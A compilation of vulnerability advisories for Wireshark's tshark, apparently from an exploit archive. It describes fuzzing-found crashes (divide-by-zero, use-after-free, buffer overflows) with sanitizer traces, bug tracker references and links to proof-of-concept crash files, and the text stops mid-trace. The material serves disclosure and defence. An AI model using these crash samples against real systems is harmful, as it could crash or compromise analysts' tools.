Copyright 1998-2015 Gerald Combs <gerald@wireshark.org> and contributors.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with GLib 2.48.1, with libpcap, with libz 1.2.8, with POSIX
capabilities (Linux), with libnl 3, without SMI, with c-ares 1.11.0, without
Lua, without Python, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos,
with GeoIP.
Running on Linux 4.6.2-1-ARCH, with locale en_US.utf8, with libpcap version
1.7.4, with libz 1.2.8.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
--
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)
The attached sample evokes a divide-by-zero error in the dissect_pbb_tlvblock() function at packet-packetbb.c:289.
The variable of interest seems to be 'c' which is set at packet-packetbb.c:285 using two other variables and an addition. When c is zero, the expression "length/c" at packet-packetbb.c:289 results in a divide-by-zero error.
Divide-by-zero has been observed when sample is parsed by tshark versions 1.12.8, 1.12.9, 1.12.10, 1.12.12, and 2.0.4 among others.
Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40197.zip
Sample generated with AFL
Build Information:
TShark 1.12.9 (v1.12.9-0-gfadb421 from (HEAD)
Copyright 1998-2015 Gerald Combs <gerald@wireshark.org> and contributors.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with GLib 2.48.1, with libpcap, with libz 1.2.8, with POSIX
capabilities (Linux), with libnl 3, without SMI, with c-ares 1.11.0, without
Lua, without Python, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos,
with GeoIP.
Running on Linux 4.6.2-1-ARCH, with locale en_US.utf8, with libpcap version
1.7.4, with libz 1.2.8.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
Built using clang 4.2.1 Compatible Clang 3.8.0 (tags/RELEASE_380/final).
--
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)
There is a bug in dissect_nds_request located in epan/dissectors/packet-ncp2222.inc.
dissect_nds_request attempts to call ptvcursor_free() near packet-ncp2222.inc:11806 using the variable ptvc that is set to null at the start of dissect_nds_request. Using the attached sample, the only place ptvc could be set (~ncp2222.inc:11618) is never executed and thus ptvc remains a null pointer.
Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40194.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=739
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
READ of size 4 at 0x60400009d960 thread T0
#0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
#1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#3 0x51e4bc in main wireshark/tshark.c:2213:13
0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
freed by thread T0 here:
#0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
#2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#4 0x51e4bc in main wireshark/tshark.c:2213:13
previously allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
#3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
#4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
#5 0x51e4bc in main wireshark/tshark.c:2213:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
Shadow bytes around the buggy address:
0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==6853==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39529.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=662
The following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
ERROR:wmem_core.c:50:wmem_alloc: assertion failed: (allocator->in_scope)
Program received signal SIGABRT, Aborted.
0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007fffe1c740d8 in __GI_abort () at abort.c:89
#2 0x00007fffe3707165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007fffe37071fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffee6b49f5 in wmem_alloc (allocator=<optimized out>, size=<optimized out>) at wmem_core.c:50
#5 0x00007fffeb0f7d40 in wmem_utoa (allocator=0x60700000bd90, port=512) at addr_resolv.c:604
#6 0x00007fffeb0f7c70 in udp_port_to_display (allocator=0x60700000bd90, port=512) at addr_resolv.c:2901
#7 0x00007fffec2e1998 in ipmi_fmt_udpport (s=0x7ffffffface0 "\030\366!\364\377\177", v=512)
at packet-ipmi.c:1283
#8 0x00007fffeb25d6ff in fill_label_number (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f", is_signed=0) at proto.c:7083
#9 0x00007fffeb2505e2 in proto_item_fill_label (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f") at proto.c:6651
#10 0x00007fffeb1f1799 in proto_tree_print_node (node=0x7ffe90b4c330, data=0x7fffffffc480) at print.c:164
#11 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4bd70,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#12 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4bd70, data=0x7fffffffc480) at print.c:219
#13 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4b0e0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#14 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4b0e0, data=0x7fffffffc480) at print.c:219
#15 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x619000152ef0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#16 0x00007fffeb1f1013 in proto_tree_print (print_args=0x7fffffffc6a0, edt=0x61300000de80,
output_only_tables=0x0, stream=0x602000340c10) at print.c:133
#17 0x000000000052b913 in print_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80) at tshark.c:4132
#18 0x00000000005266ff in process_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80, offset=24,
whdr=0x61400000f060, pd=0x61b000012d80 "", tap_flags=0) at tshark.c:3742
#19 0x000000000051f961 in load_cap_file (cf=0x14ac0c0 <cfile>, save_file=0x0, out_file_type=2,
out_file_name_res=0, max_packet_count=0, max_byte_count=0) at tshark.c:3484
#20 0x0000000000515db0 in main (argc=3, argv=0x7fffffffe248) at tshark.c:2197
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11831. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38994.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=651
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68
READ of size 1 at 0x6070000003a0 thread T0
#0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13
#1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14
#2 0x5422e2 in print_packet wireshark/tshark.c:4155:10
#3 0x53cb2e in process_packet wireshark/tshark.c:3742:7
#4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#5 0x52c1df in main wireshark/tshark.c:2197:13
0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)
freed by thread T0 here:
#0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3
#2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3
#3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3
#4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2
#5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4
#6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5
#7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#18 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#20 0x53c91b in process_packet wireshark/tshark.c:3728:5
#21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#22 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2
#3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6
#4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x53c91b in process_packet wireshark/tshark.c:3728:5
#18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#19 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer
Shadow bytes around the buggy address:
0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd
0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==14146==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39503.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=649
The following crash due to a static buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8089==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000df60580 at pc 0x000000d6eb8c bp 0x7ffc622f4a80 sp 0x7ffc622f4a78
WRITE of size 1 at 0x00000df60580 thread T0
#0 0xd6eb8b in my_dgt_tbcd_unpack wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16
#1 0xd71258 in de_mid wireshark/epan/dissectors/packet-gsm_a_common.c:2270:9
#2 0x3c7ce02 in dissect_uma_IE wireshark/epan/dissectors/packet-uma.c:912:3
#3 0x3c7bfd1 in dissect_uma wireshark/epan/dissectors/packet-uma.c:1664:13
#4 0x1317640 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2740:13
#5 0x3c7b62b in dissect_uma_tcp wireshark/epan/dissectors/packet-uma.c:1699:2
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x1318ea7 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
#10 0x131ea52 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#11 0x1319ad8 in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#12 0x132fb70 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#13 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#15 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#16 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#17 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#22 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#23 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#24 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#25 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#26 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#27 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#28 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#32 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#36 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#37 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#38 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#39 0x53c91b in process_packet wireshark/tshark.c:3728:5
#40 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#41 0x52c1df in main wireshark/tshark.c:2197:13
0x00000df60580 is located 0 bytes to the right of global variable 'a_bigbuf' defined in 'packet-gsm_a_common.c:762:13' (0xdf60180) of size 1024
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16 in my_dgt_tbcd_unpack
Shadow bytes around the buggy address:
0x000081be4060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x000081be40b0:[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40e0: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000081be40f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8089==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11797. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39000.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=653
The following SIGSEGV crash due to an invalid memory write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31799==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000fff3 (pc 0x7f538efe2e98 bp 0x7ffff1414290 sp 0x7ffff1413a18 T0)
#0 0x7f538efe2e97 /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
#1 0x4aaeac in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#2 0x7f53989ebdee in get_value wireshark/epan/dissectors/packet-btatt.c:6021:9
#3 0x7f53989cd2a1 in dissect_btatt wireshark/epan/dissectors/packet-btatt.c:6434:40
#4 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#6 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#7 0x7f5398abde89 in dissect_btl2cap wireshark/epan/dissectors/packet-btl2cap.c:2217:26
#8 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#9 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#10 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#11 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#12 0x7f5398add99f in dissect_btle wireshark/epan/dissectors/packet-btle.c:760:21
#13 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#15 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#16 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#17 0x7f5398ae089b in dissect_btle_rf wireshark/epan/dissectors/packet-btle_rf.c:221:27
#18 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#20 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0x7f53989467c5 in dissect_bluetooth wireshark/epan/dissectors/packet-bluetooth.c:1748:10
#22 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f539911d5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f539840933b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f53983b73c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
==31799==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11817. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38998.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=650
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==9819==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000027b3c at pc 0x00000087416b bp 0x7fff95547770 sp 0x7fff95547768
WRITE of size 1 at 0x603000027b3c thread T0
#0 0x87416a in iseries_parse_packet wireshark/wiretap/iseries.c:820:27
#1 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
#2 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#3 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#4 0x52c1df in main wireshark/tshark.c:2197:13
